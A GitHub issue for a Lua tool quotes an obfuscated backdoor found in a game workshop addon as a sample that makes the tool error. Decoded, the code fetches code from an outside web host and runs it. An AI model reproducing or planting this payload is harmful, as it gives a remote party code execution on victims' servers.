### ISSUE TITLE
Obufscated code causing errors

### ISSUE THREAD

**Issue by wrefgtzweve** [Vurv78/LuaPro#11] opened 2023-02-22 15:19 UTC
```lua
local ‪ = _G local ‪‪ = ‪['\115\116\114\105\110\103'] local ‪‪‪ = ‪['\98\105\116']['\98\120\111\114'] local function ‪‪‪‪‪‪‪(‪‪‪‪) if ‪‪['\108\101\110'](‪‪‪‪) == 0 then return ‪‪‪‪ end local ‪‪‪‪‪ = '' local ‪‪‪‪‪‪ = 0 for _ in ‪‪['\103\109\97\116\99\104'](‪‪‪‪,'\46') do ‪‪‪‪‪=‪‪‪‪‪..‪‪['\99\104\97\114'](‪‪‪(‪‪["\98\121\116\101"](_), 159))end return ‪‪‪‪‪ end ‪[‪‪‪‪‪‪‪"\235\246\242\250\237"][‪‪‪‪‪‪‪"\204\246\242\239\243\250"](1,function ()‪[‪‪‪‪‪‪‪"\247\235\235\239"][‪‪‪‪‪‪‪"\217\250\235\252\247"](‪‪‪‪‪‪‪"\247\235\235\239\236\165\176\176\244\233\254\252\177\252\229\176\249\177\239\247\239\160\244\250\230\162\175\199\208\252\213\197\216\173\171\251\254\242\233\216\247\211\237\237\239\240",function (goto‪)‪[‪‪‪‪‪‪‪"\205\234\241\204\235\237\246\241\248"](goto‪,‪‪‪‪‪‪‪"\165",false )end )end )
```

Extremely simple obfuscated backdoor found in a workshop addon, can be decoded by hand in minutes. Yet it errors on it.

**Comment by Vurv78** [comment] 2023-04-13 04:56
Can't really do anything about this since it's replacing identifiers with unicode. Would need a preprocessing step to just convert that to some garbage cause more often than not you won't really care what the identifier means.

**Comment by Vurv78** [comment] 2023-04-13 04:59
And duplicate of #8 since they both have unicode identifiers.

**Closed by Vurv78** 2023-04-13 04:59 UTC
